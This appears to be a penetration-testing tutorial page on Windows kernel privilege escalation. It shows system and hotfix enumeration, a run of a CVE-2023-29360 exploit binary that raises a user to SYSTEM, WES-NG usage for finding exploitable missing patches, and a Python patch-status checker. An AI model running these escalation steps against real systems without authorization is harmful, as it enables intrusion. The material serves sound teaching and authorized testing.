# Kernel

**Kernel exploits** leverage Windows kernel vulnerabilities and typically yield high privileges, but they require advanced knowledge and carry a high risk of crashing the system.

{% tabs %}
{% tab title="1. System Info" %}

```powershell
> systeminfo

Host Name:                 CLIENTWK220
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22621 N/A Build 22621
...
```

{% endtab %}

{% tab title="2. Hotfixes" %}
{% code overflow="wrap" %}

```powershell
# enumerate security patches
> Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

Source        Description      HotFixID      InstalledBy         InstalledOn
------        -----------      --------      -----------         -----------
              Security Update  KB5025239                         5/4/2023 12:00:00 AM
              Security Update  KB5025749                         5/4/2023 12:00:00 AM
              Security Update  KB5017233                         9/25/2022 12:00:00 AM
```

{% endcode %}
{% endtab %}

{% tab title="3. Exploit" %}
{% code overflow="wrap" %}

```powershell
> whoami
clientwk220\steve

> .\CVE-2023-29360.exe
[+] Device Description: Microsoft Streaming Service Proxy
Hardware IDs:
        "SW\{96E080C7-143C-11D1-B40F-00A0C9223196}"
[+] Device Instance ID: SW\{96E080C7-143C-11D1-B40F-00A0C9223196}\{3C0D501A-140B-11D1-B40F-00A0C9223196}
[+] First mapped _MDL: 20c2f3c00c0
[+] Second mapped _MDL: 20c2f3d0040
[+] Unprivileged token reference: ffffbc053be6d06d
[+] System token reference: ffffbc052ea7d496
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.

>whoami
nt authority\system
```

{% endcode %}
{% endtab %}
{% endtabs %}

> *Vulnerabilities in Windows can be found in the* [*Security Update Guide*](https://msrc.microsoft.com/update-guide/)*, such as* [*CVE-2023-29360*](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29360)*, and their corresponding security updates are listed on the* [*Microsoft Update Catalog*](https://catalog.update.microsoft.com/Search.aspx?q=KB5027231) *page.*

## WES-NG

[Windows Exploit Suggester – Next Generation (WES-NG)](https://github.com/bitsadmin/wesng) is a post-exploitation tool that analyzes Windows system information to identify unpatched vulnerabilities and associated exploits. It supports all Windows OSs from XP through Windows 11, including server editions.

```bash
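# Clone the repo
git clone https://github.com/bitsadmin/wesng --depth 1
cd wesng

# Update the vulnerability definitions
python3 wes.py --update

# On the target host, run: systeminfo > systeminfo.txt
# Then analyze the file, showing only vulnerabilities with known exploits
python3 wes.py systeminfo.txt -e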
```

This tool can generate a lot of false positives; see the [Eliminating false positives](https://github.com/bitsadmin/wesng/wiki/Eliminating-false-positives) wiki page for how to eliminate them. The tool can also validate findings against Microsoft’s Update Catalog using the `--muc-lookup` option to reduce false positives, as the raw MSRC feed can be incomplete.
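
A fix KB can be missing from the hotfix list simply because a later cumulative update replaced it, so a patch check should look at the build revision as well as the KB list. The sketch below is an added example (not part of WES-NG or the original page); the function names, the constructed sample input, and the `FIX_UBR` placeholder are assumptions.

```python
import re

# Constructed sample input, modelled on the outputs shown on this page.
SAMPLE_BANNER = "Microsoft Windows [Version 10.0.22621.1555]"
SAMPLE_HOTFIXES = """\
Source  Description      HotFixID   InstalledBy  InstalledOn
------  -----------      --------   -----------  -----------
        Security Update  KB5025239               5/4/2023 12:00:00 AM
        Security Update  KB5025749               5/4/2023 12:00:00 AM
        Security Update  KB5017233               9/25/2022 12:00:00 AM
"""

def parse_banner(banner):
    """Return (build, revision) from 'Version 10.0.<build>.<revision>', or None."""
    m = re.search(r"Version\s+\d+\.\d+\.(\d+)\.(\d+)", banner)
    return (int(m.group(1)), int(m.group(2))) if m else None

def parse_hotfix_ids(table_text):
    """Collect KB identifiers from Get-CimInstance table output."""
    return {kb.upper() for kb in re.findall(r"\bKB\d{6,7}\b", table_text, re.I)}

def patch_status(banner, hotfix_text, fix_kb, fix_build, fix_ubr):
    """Classify a host against one fix.

    fix_kb    -- KB that first shipped the fix
    fix_build -- OS build that KB applies to (e.g. 22621)
    fix_ubr   -- build revision that KB installs (taken from the KB article)
    """
    if fix_kb.upper() in parse_hotfix_ids(hotfix_text):
        return "patched (fix KB listed)"
    version = parse_banner(banner)
    if version is None:
        # systeminfo's "OS Version" line carries no revision number
        return "unknown (no build revision)"
    build, ubr = version
    if build != fix_build:
        return "unknown (different OS build, needs its own KB)"
    if ubr >= fix_ubr:
        return "patched (superseded by later cumulative update)"
    return "missing"

if __name__ == "__main__":
    # FIX_UBR is a placeholder: read the real revision from the KB article.
    FIX_UBR = 9999
    print(patch_status(SAMPLE_BANNER, SAMPLE_HOTFIXES, "KB5027231", 22621, FIX_UBR))
```
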
